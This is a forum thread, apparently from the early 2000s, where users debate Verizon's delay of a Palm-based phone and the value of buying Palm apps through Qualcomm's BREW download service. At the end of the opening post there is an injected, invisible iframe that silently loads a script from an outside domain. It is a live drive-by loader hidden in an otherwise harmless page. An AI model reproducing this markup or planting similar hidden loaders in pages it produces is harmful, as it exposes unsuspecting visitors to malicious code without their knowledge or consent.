+ Reply to Thread

Another reason to wait for the 7135

Long, LONG time lurker, first time poster. Ran across this link earlier today: http://infoworld.com/article/03/03/1...ownload_1.html

I would say that, since it's BREW, Verizon Wireless should have it soon but look how long it's taking them to release the 7135 in the first place. Regardless, the phone looks like a winner.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Another reason to wait for the 7135

I'm a bit baffled by this release. BREW (or JAVA) makes plenty of sense on phones which are a closed system, but why would anyone PAY to download apps to an open system like a PALM? It's one of the main reasons a lot of people here like Palm smartphones. Are they targeting people who don't realize there are thousands of FREE apps downloadable from PalmGear and a hundred other places?

I certainly hope this is not the reason VZ is delaying!

Originally posted by William
    Long, LONG time lurker, first time poster. Ran across this link earlier today: http://infoworld.com/article/03/03/1...ownload_1.html

I would say that, since it's BREW, Verizon Wireless should have it soon but look how long it's taking them to release the 7135 in the first place. Regardless, the phone looks like a winner.

Convenience. The idea behind BREW is that you can download what you want, when you want, wherever you are. For me, many times, that is worth it.

Yup, I agree. This is a great way to sell software for the phone since you don't have to provide the credit card number and so forth right there. I am pretty sure there will be trials for the software like there is right now on BREW.

I think Qualcomm (sp) did a smart thing. BREW has been the best way to distribute software via phone - billing is easy. Since there is a growing number of palm os phones out there, i can see why this would be great.

i wonder if they have plans to do this with PPC devices such as the upcoming samsung phone...

Too bad getconnected doesn't do the upgrades! argh!

Granted as delivery mechanism for apps that already have a registration fee (and for people that are honest enough to pay that fee), this would be good - but I see some issues:

- Many Palm apps are free. I doubt they would be downloadable for free under BREW, so the price could only represent what the convenience factor is worth.

- It would have to be a one time fee for the life of the app. I can't speak for Verizon, but Sprint's game so far has been to charge a few bucks for just a limited usage time. It's more of a subscription. No way a Palm user would accept this scheme when they can load apps themselves for a one time fee forever.

- A downside is that the app is not resident on your desktop as a backup if your phone crashes hard. You'd have to re-download from the server. One would hope subsequent downloads of the same app (to the same device) are free, otherwise this would be another disincentive.

There is the additional problem of if you can run a program you used brew to download. Will it work like getting a program beamed to you? If not, you still have to sync it. I'm not a programmer so I don't really know how these things work.
    ---------------
    The same thing we do every night, Pinky...